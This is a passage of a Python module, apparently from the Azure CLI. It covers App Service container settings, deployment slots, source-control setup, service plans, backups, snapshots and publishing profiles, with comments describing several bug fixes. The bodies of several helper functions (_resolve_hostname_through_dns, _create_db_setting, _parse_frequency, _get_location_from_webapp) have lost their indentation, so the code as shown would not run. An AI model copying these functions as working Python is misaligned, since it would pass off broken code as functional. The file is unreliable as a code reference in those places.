        encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
        linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
        update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
    elif multicontainer_config_file or multicontainer_config_type:
        # both are required together; warn rather than partially apply
        logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
    return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
                                                                          slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
                                          docker_custom_image_name=None, docker_registry_server_user=None,
                                          docker_registry_server_password=None, slot=None):
    """Function-app variant: delegates without the storage toggle or multicontainer options."""
    return update_container_settings(cmd, resource_group_name, name,
                                     docker_registry_server_url=docker_registry_server_url,
                                     docker_custom_image_name=docker_custom_image_name,
                                     docker_registry_server_user=docker_registry_server_user,
                                     websites_enable_app_service_storage=None,
                                     docker_registry_server_password=docker_registry_server_password,
                                     multicontainer_config_type=None,
                                     multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
    """Look up admin credentials for an Azure Container Registry by name.

    Returns (username, password). Raises CLIError when the registry cannot be
    uniquely resolved or its admin user is disabled.
    """
    from azure.mgmt.containerregistry import ContainerRegistryManagementClient
    from azure.cli.core.commands.parameters import get_resources_in_subscription
    client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
    result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
    # BUG FIX: compare case-insensitively on BOTH sides — the name parsed from a
    # registry URL can retain the caller's casing, so lowering only item.name
    # could miss an existing registry.
    result = [item for item in result if item.name.lower() == registry_name.lower()]
    if not result or len(result) > 1:
        raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
    resource_group_name = parse_resource_id(result[0].id)['resource_group']
    registry = client.get(resource_group_name, registry_name)
    if registry.admin_user_enabled:  # pylint: disable=no-member
        cred = client.list_credentials(resource_group_name, registry_name)
        return cred.username, cred.passwords[0].value
    raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
                   "credentials or run 'az acr update -n {} --admin-enabled true' to enable "
                   "admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
    """Clear the container fx version and remove all container-related app settings."""
    _delete_linux_fx_version(cmd, resource_group_name, name, slot)
    delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
    """Show container-related settings with registry credentials masked."""
    app_settings = get_app_settings(cmd, resource_group_name, name, slot)
    container_settings = _filter_for_container_settings(cmd, resource_group_name, name, app_settings,
                                                        show_multicontainer_config, slot)
    return _mask_creds_related_appsettings(container_settings)
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
    """Function-app variant: no multicontainer config decoding."""
    return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
                                   show_multicontainer_config=None, slot=None):
    """Keep only container-related settings, appending the (optionally decoded) image name."""
    filtered = [entry for entry in settings if entry['name'] in CONTAINER_APPSETTING_NAMES]
    fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
    if fx_version:
        filtered.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME',
                         'value': fx_version})
        if show_multicontainer_config:
            decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
            filtered.append({'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
                             'value': decoded_value})
    return filtered
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
    """Null out sensitive registry settings (APPSETTINGS_TO_MASK) before display.

    Accepts either the raw name->value dict (as passed by
    _build_app_settings_output) or the list of {'name': ..., 'value': ...}
    entries produced by _filter_for_container_settings.

    BUG FIX: the original iterated `settings` and tested membership in
    APPSETTINGS_TO_MASK directly; for the list-of-dicts form each element is a
    dict, which is never equal to a string, so DOCKER_REGISTRY_SERVER_PASSWORD
    leaked through unmasked on the container-settings path.
    """
    if isinstance(settings, dict):
        for key in [k for k in settings if k in APPSETTINGS_TO_MASK]:
            settings[key] = None
    else:
        for entry in settings:
            if entry.get('name') in APPSETTINGS_TO_MASK:
                entry['value'] = None
    return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Bind a custom hostname to the app (or the given slot)."""
    HostNameBinding = cmd.get_models('HostNameBinding')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
    if slot is None:
        return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name,
                                                                  hostname, binding)
    return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name,
                                                                   hostname, binding, slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
    """Unbind a custom hostname from the app (or the given slot)."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
    # NOTE: the slot variant takes (slot, hostname) in that order
    return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
    """List hostname bindings, trimming resource names down to the bare hostname segment."""
    bindings = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                            'list_host_name_bindings', slot))
    for binding in bindings:
        binding.name = binding.name.split('/')[-1]
    return bindings
def get_external_ip(cmd, resource_group_name, webapp_name):
    """Return the app's inbound IP address as {'ip': ...}.

    Apps hosted in an App Service Environment use the environment's VIPs;
    everything else is resolved through DNS from the default hostname.
    """
    SslState = cmd.get_models('SslState')
    # logics here are ported from portal
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, webapp_name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(webapp_name))
    if webapp.hosting_environment_profile:
        address = client.app_service_environments.list_vips(
            resource_group_name, webapp.hosting_environment_profile.name)
        if address.internal_ip_address:
            # internal-load-balancer ASE: only the internal IP is reachable
            ip_address = address.internal_ip_address
        else:
            # external ASE: prefer an IP-based SSL binding's virtual IP if one exists
            vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
            ip_address = vip.virtual_ip if vip else address.service_ip_address
    else:
        ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
    return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
    """Create a deployment slot for a webapp.

    When *configuration_source* is given (either the production app's own name
    or another slot's name), the source's site configuration, app settings and
    connection strings are cloned onto the new slot after creation.
    Raises CLIError when the app does not exist or is a function app.
    """
    Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, webapp)
    site_config = get_site_configs(cmd, resource_group_name, webapp, None)
    if not site:
        raise CLIError("'{}' app doesn't exist".format(webapp))
    if 'functionapp' in site.kind:
        raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
    location = site.location
    slot_def = Site(server_farm_id=site.server_farm_id, location=location)
    slot_def.site_config = SiteConfig()
    # if it is a Windows Container site, at least pass the necessary
    # app settings to perform the container image validation:
    if configuration_source and site_config.windows_fx_version:
        # get settings from the source
        clone_from_prod = configuration_source.lower() == webapp.lower()
        src_slot = None if clone_from_prod else configuration_source
        app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                               'list_application_settings', src_slot)
        # only the Docker registry credentials are needed for image validation
        settings = []
        for k, v in app_settings.properties.items():
            if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
                     "DOCKER_REGISTRY_SERVER_URL"):
                settings.append(NameValuePair(name=k, value=v))
        slot_def.site_config = SiteConfig(app_settings=settings)
    poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    # clone the full configuration only after the slot actually exists
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)

    result.name = result.name.split('/')[-1]
    return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
    """Create a deployment slot for a function app, optionally cloning configuration
    from the production app or another slot."""
    Site = cmd.get_models('Site')
    client = web_client_factory(cmd.cli_ctx)
    site = client.web_apps.get(resource_group_name, name)
    if not site:
        raise CLIError("'{}' function app doesn't exist".format(name))
    slot_def = Site(server_farm_id=site.server_farm_id, location=site.location)
    poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
    result = LongRunningOperation(cmd.cli_ctx)(poller)
    if configuration_source:
        update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
    # strip the 'site/' prefix from the returned slot name
    result.name = result.name.split('/')[-1]
    return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
    """Clone site config, app settings and connection strings from
    *configuration_source* (production when it equals the app name, otherwise
    that slot) onto *slot*, excluding any settings marked as slot-sticky.
    """
    clone_from_prod = configuration_source.lower() == webapp.lower()
    site_config = get_site_configs(cmd, resource_group_name, webapp,
                                   None if clone_from_prod else configuration_source)
    _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                            'update_configuration', slot, site_config)

    # slot create doesn't clone over the app-settings and connection-strings, so we do it here
    # also make sure slot settings don't get propagated.
    slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
    src_slot = None if clone_from_prod else configuration_source
    app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                           'list_application_settings',
                                           src_slot)
    # drop slot-sticky app settings before copying
    for a in slot_cfg_names.app_setting_names or []:
        app_settings.properties.pop(a, None)

    connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
                                                 'list_connection_strings',
                                                 src_slot)
    # drop slot-sticky connection strings before copying
    for a in slot_cfg_names.connection_string_names or []:
        connection_strings.properties.pop(a, None)

    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_application_settings',
                                app_settings.properties, slot, client)
    _generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
                                'update_connection_strings',
                                connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
                          manual_integration=None, git_token=None, slot=None, cd_app_type=None,
                          app_working_dir=None, nodejs_task_runner=None, python_framework=None,
                          python_version=None, cd_account_create=None, cd_project_url=None, test=None,
                          slot_swap=None, private_repo_username=None, private_repo_password=None):
    """Hook a webapp (or slot) up to source control.

    Two modes:
    - *cd_project_url* given: delegate to the VSTS continuous-delivery
      provider (the cd_* / task-runner parameters apply only here).
    - otherwise: configure Kudu-based source control directly; the cd_*
      parameters must not be supplied in this mode.
    """
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)

    if cd_project_url:
        # Add default values
        cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
        python_framework = 'Django' if python_framework is None else python_framework
        python_version = 'Python 3.5.3 x86' if python_version is None else python_version

        webapp_list = None if test is None else list_webapp(resource_group_name)
        vsts_provider = VstsContinuousDeliveryProvider()
        cd_app_type_details = {
            'cd_app_type': cd_app_type,
            'app_working_dir': app_working_dir,
            'nodejs_task_runner': nodejs_task_runner,
            'python_framework': python_framework,
            'python_version': python_version
        }
        try:
            status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
                                                             branch, git_token, slot_swap, cd_app_type_details,
                                                             cd_project_url, cd_account_create, location, test,
                                                             private_repo_username, private_repo_password, webapp_list)
        except RuntimeError as ex:
            raise CLIError(ex)
        logger.warning(status.status_message)
        return status
    # reject VSTS-only parameters in the non-VSTS path
    non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
                       python_version, cd_account_create, test, slot_swap]
    if any(non_vsts_params):
        raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
                       'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
                       'python_version, cd_account_create, test, slot_swap')
    from azure.mgmt.web.models import SiteSourceControl, SourceControl
    if git_token:
        # cache the GitHub token at the subscription level first
        sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
        client.update_source_control('GitHub', sc)

    source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
                                       is_manual_integration=manual_integration,
                                       is_mercurial=(repository_type != 'git'))

    # SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
    for i in range(5):
        try:
            poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                             'create_or_update_source_control',
                                             slot, source_control)
            return LongRunningOperation(cmd.cli_ctx)(poller)
        except Exception as ex:  # pylint: disable=broad-except
            import re
            ex = ex_handler_factory(no_throw=True)(ex)
            # for non server errors(50x), just throw; otherwise retry 4 times
            if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
                raise
            logger.warning('retrying %s/4', i + 1)
            time.sleep(5)   # retry in a moment
def update_git_token(cmd, git_token=None):
    '''
    Update source control token cached in Azure app service. If no token is provided,
    the command will clean up existing token. Note this is a subscription-wide setting.
    '''
    from azure.mgmt.web.models import SourceControl
    client = web_client_factory(cmd.cli_ctx)
    token = git_token or ''
    sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=token)
    return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
    """Show the source-control configuration of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
    """Delete the source-control configuration of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
    """Switch the site's deployment source to local git and return the clone URL."""
    SiteConfigResource = cmd.get_models('SiteConfigResource')
    client = web_client_factory(cmd.cli_ctx)
    location = _get_location_from_webapp(client, resource_group_name, name)
    config = SiteConfigResource(location=location)
    config.scm_type = 'LocalGit'
    if slot is None:
        client.web_apps.create_or_update_configuration(resource_group_name, name, config)
    else:
        client.web_apps.create_or_update_configuration_slot(resource_group_name, name, config, slot)
    git_url = _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)
    return {'url': git_url}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
    """Trigger a repository sync for the site (or slot)."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
    except CloudError as ex:
        # Because of a bad REST spec, the SDK raises even on 200/204; swallow
        # those success statuses and re-raise anything else.
        if ex.status_code not in (200, 204):
            raise ex
def list_app_service_plans(cmd, resource_group_name=None):
    """List app service plans, subscription-wide or within one resource group."""
    client = web_client_factory(cmd.cli_ctx)
    if resource_group_name is not None:
        plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
    else:
        # detailed=True enables querying "numberOfSites"
        plans = list(client.app_service_plans.list(detailed=True))
    for plan in plans:
        # prune a few useless fields
        del plan.geo_region
        del plan.subscription
    return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
                            app_service_environment=None, sku='B1', number_of_workers=None, location=None,
                            tags=None, no_wait=False):
    """Create an app service plan.

    When *app_service_environment* is given the plan is placed inside that ASE
    and inherits its location; otherwise *location* defaults to the resource
    group's location. Raises CLIError on conflicting flags or a missing ASE.

    BUGFIX: the ASE-not-found error used to format ``ase.id`` — the id of the
    *last* environment examined — and crashed with AttributeError when the
    subscription had no ASEs at all; it now reports the requested name.
    """
    HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
        'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    _validate_asp_sku(app_service_environment, sku)
    if is_linux and hyper_v:
        raise CLIError('usage error: --is-linux | --hyper-v')
    client = web_client_factory(cmd.cli_ctx)
    if app_service_environment:
        if hyper_v:
            raise CLIError('Windows containers is not yet supported in app service environment')
        ase_def = None
        for ase in client.app_service_environments.list():
            if ase.name.lower() == app_service_environment.lower():
                ase_def = HostingEnvironmentProfile(id=ase.id)
                location = ase.location  # plans must live in the ASE's location
                break
        if ase_def is None:
            raise CLIError("App service environment '{}' not found in subscription.".format(
                app_service_environment))
    else:  # Non-ASE
        ase_def = None
        if location is None:
            location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    # the api is odd on parameter naming, have to live with it for now
    sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
                              per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
    return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
                       resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
    """Apply a new SKU and/or worker count to an app service plan instance and return it."""
    if sku is None and number_of_workers is None:
        logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
    sku_def = instance.sku
    if sku is not None:
        normalized = _normalize_sku(sku)
        sku_def.tier = get_sku_name(normalized)
        sku_def.name = normalized
    if number_of_workers is not None:
        sku_def.capacity = number_of_workers
    instance.sku = sku_def
    return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
    """Update a function app plan's SKU, worker count and/or Elastic Premium max burst.

    Raises CLIError when --max-burst is used on a non-Elastic-Premium plan or
    when a flag value is out of range.

    BUGFIX: ``update_app_service_plan`` used to be applied twice — first with
    the *unvalidated* worker count, then again after validation — duplicating
    the "no update" warning and mutating the plan before validation could
    fail. Validation now happens first and the update is applied once.
    """
    if max_burst is not None:
        if not is_plan_elastic_premium(cmd, instance):
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
        instance.maximum_elastic_worker_count = max_burst
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
                                                       number_of_workers, min_val=0, max_val=20)
    return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
    """Fetch the site's backup configuration, mapping any failure to a friendly error."""
    try:
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                       'get_backup_configuration', slot)
    except Exception:  # pylint: disable=broad-except
        # deliberately broad: surface a single clear message whatever went wrong
        raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
    """List the existing backups of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                   'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
                  db_name=None, db_type=None,
                  db_connection_string=None, backup_name=None, slot=None):
    """Trigger an on-demand backup of a webapp (or slot) into the given storage container."""
    BackupRequest = cmd.get_models('BackupRequest')
    client = web_client_factory(cmd.cli_ctx)
    # drop a trailing '.zip' extension if the user supplied one
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    databases = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    request = BackupRequest(backup_name=backup_name,
                            storage_account_url=storage_account_url, databases=databases)
    if not slot:
        return client.web_apps.backup(resource_group_name, webapp_name, request)
    return client.web_apps.backup_slot(resource_group_name, webapp_name, request, slot)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
                           frequency=None, keep_at_least_one_backup=None,
                           retention_period_in_days=None, db_name=None,
                           db_connection_string=None, db_type=None, backup_name=None, slot=None):
    """Create or update the site's scheduled-backup configuration.

    Any argument left as None falls back to the value in the existing
    configuration; when no configuration exists yet, storage URL, frequency,
    retention and retain-one must all be supplied or a CLIError is raised.
    """
    BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
    configuration = None
    # normalize the backup name: strip '.zip', default to '<app>_<timestamp>'
    if backup_name and backup_name.lower().endswith('.zip'):
        backup_name = backup_name[:-4]
    if not backup_name:
        backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))

    try:
        configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
                                                'get_backup_configuration', slot)
    except DefaultErrorResponseException:
        # No configuration set yet
        if not all([storage_account_url, frequency, retention_period_in_days,
                    keep_at_least_one_backup]):
            raise CLIError('No backup configuration found. A configuration must be created. ' +
                           'Usage: --container-url URL --frequency TIME --retention DAYS ' +
                           '--retain-one TRUE/FALSE')

    # If arguments were not specified, use the values in the current backup schedule
    if storage_account_url is None:
        storage_account_url = configuration.storage_account_url

    if retention_period_in_days is None:
        retention_period_in_days = configuration.backup_schedule.retention_period_in_days

    if keep_at_least_one_backup is None:
        keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
    else:
        # flag arrives as a string; coerce to bool
        keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'

    if frequency:
        # Parse schedule frequency
        frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
    else:
        frequency_num = configuration.backup_schedule.frequency_interval
        frequency_unit = configuration.backup_schedule.frequency_unit

    # carry over existing database settings unless explicitly overridden
    if configuration and configuration.databases:
        db = configuration.databases[0]
        db_type = db_type or db.database_type
        db_name = db_name or db.name
        db_connection_string = db_connection_string or db.connection_string

    db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)

    backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
                                     keep_at_least_one_backup=keep_at_least_one_backup,
                                     retention_period_in_days=retention_period_in_days)
    backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
                                   enabled=True, storage_account_url=storage_account_url,
                                   databases=db_setting)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
                                   slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
                   db_name=None, db_type=None, db_connection_string=None,
                   target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
    """Restore a webapp (or slot) from a named backup blob in the given storage container."""
    RestoreRequest = cmd.get_models('RestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    # backups are stored as '.zip' blobs; append the extension when missing
    blob_name = backup_name if backup_name.lower().endswith('.zip') else backup_name + '.zip'
    databases = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
    request = RestoreRequest(storage_account_url=storage_account_url,
                             blob_name=blob_name, overwrite=overwrite,
                             site_name=target_name, databases=databases,
                             ignore_conflicting_host_names=ignore_hostname_conflict)
    if not slot:
        return client.web_apps.restore(resource_group_name, webapp_name, 0, request)
    return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, request, slot)
def list_snapshots(cmd, resource_group_name, name, slot=None):
    """List the restorable snapshots of a webapp (or slot)."""
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                   'list_snapshots', slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False,  # pylint: disable=redefined-outer-name
                     source_resource_group=None, source_name=None, source_slot=None):
    """Restore a webapp (or slot) from a snapshot.

    With both *source_resource_group* and *source_name*, restores the source
    app's snapshot onto the target app (no overwrite); with neither, restores
    the app from its own snapshot (overwrite). Supplying only one of the two
    source arguments is a usage error. *restore_content_only* skips restoring
    the app configuration.
    """
    from azure.cli.core.commands.client_factory import get_subscription_id
    SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
    client = web_client_factory(cmd.cli_ctx)
    recover_config = not restore_content_only
    if all([source_resource_group, source_name]):
        # Restore from source app to target app
        sub_id = get_subscription_id(cmd.cli_ctx)
        source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
            "/providers/Microsoft.Web/sites/" + source_name
        if source_slot:
            source_id = source_id + "/slots/" + source_slot
        source = SnapshotRecoverySource(id=source_id)
        request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
                                         recover_configuration=recover_config)
        if slot:
            return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
        return client.web_apps.restore_snapshot(resource_group_name, name, request)
    if any([source_resource_group, source_name]):
        raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
    # Overwrite app with its own snapshot
    request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
    if slot:
        return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
    return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
    """Return the Azure location of the given resource group."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    return client.resource_groups.get(resource_group_name).location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
    """Return the locations where the 'deletedSites' resource type is available."""
    client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    web_provider = client.providers.get('Microsoft.Web')
    for resource_type in web_provider.resource_types:
        if resource_type.resource_type == 'deletedSites':
            return resource_type.locations
    return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
    """Compose the authenticated local-git clone URL for a site."""
    user = client.get_publishing_user()
    source_control = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
    parsed = urlparse(source_control.repo_url)
    return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name, parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
    """Return the https URL of the site's Kudu (SCM) host."""
    from azure.mgmt.web.models import HostType
    webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
    scm_host = next((h for h in webapp.host_name_ssl_states or []
                     if h.host_type == HostType.repository), None)
    if scm_host is None:
        # this should not happen, but throw anyway
        raise ValueError('Failed to retrieve Scm Uri')
    return "https://{}".format(scm_host.name)
def get_publishing_user(cmd):
    """Return the subscription-wide publishing (deployment) user."""
    return web_client_factory(cmd.cli_ctx).get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
    '''
    Update deployment credentials.(Note, all webapps in your subscription will be impacted)
    '''
    User = cmd.get_models('User')
    client = web_client_factory(cmd.cli_ctx)
    if password is None:
        # interactively prompt when possible; fail clearly otherwise
        try:
            password = prompt_pass(msg='Password: ', confirm=True)
        except NoTTYException:
            raise CLIError('Please specify both username and password in non-interactive mode.')
    user = User(publishing_user_name=user_name)
    user.publishing_password = password
    return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
    """Return the site's publishing credentials (resolves the long-running operation)."""
    poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                     'list_publishing_credentials', slot)
    return poller.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
    """Return the site's publish profiles parsed into dicts, or the raw XML when *xml* is set.

    BUGFIX: with exactly one ``<publishProfile>`` element xmltodict returns a
    dict instead of a list; the old code then iterated over the dict's keys
    and produced garbage entries. A lone profile is now wrapped in a list.
    """
    import xmltodict
    content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                      'list_publishing_profile_xml_with_secrets', slot)
    full_xml = ''
    for f in content:
        full_xml += f.decode()

    if not xml:
        profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
        if not isinstance(profiles, list):
            profiles = [profiles]
        converted = []
        for profile in profiles:
            new = {}
            for key in profile:
                # strip the leading '@' xmltodict put in for attributes
                new[key.lstrip('@')] = profile[key]
            converted.append(new)
        return converted
    cmd.cli_ctx.invocation.data['output'] = 'tsv'
    return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
    """Toggle Docker continuous deployment and return the webhook URL info."""
    update_app_settings(cmd, resource_group_name, name,
                        ["DOCKER_ENABLE_CI=" + enable], slot)
    return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
